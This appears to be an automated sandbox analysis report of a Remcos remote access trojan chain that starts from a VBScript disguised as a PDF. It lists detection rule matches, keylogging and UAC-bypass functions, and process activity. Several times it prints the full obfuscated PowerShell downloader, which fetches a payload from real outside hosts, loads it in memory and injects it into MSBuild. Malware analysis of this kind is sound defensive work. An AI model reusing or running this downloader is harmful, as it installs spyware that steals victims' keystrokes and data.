                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_00409B10
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Contains functionalty to change the wallpaper
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041BB77 SystemParametersInfoW,15_2_0041BB77

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004158B9
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041D07115_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004520D215_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043D09815_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043715015_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004361AA15_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0042625415_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043137715_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041E5DF15_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044C73915_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004267CB15_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043C9DD15_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00432A4915_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043CC0C15_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00434D2215_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426E7315_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00440E2015_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0043CE3B15_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00412F4515_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00452F0015_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00426FAD15_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
                        Source: Aktarma,pdf.vbsInitial sample: Strings found which are bigger than 50
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@13/11@5/5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmcghghyrtssxr-7RL1P2
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a32j0lwm.w2c.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\classers.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
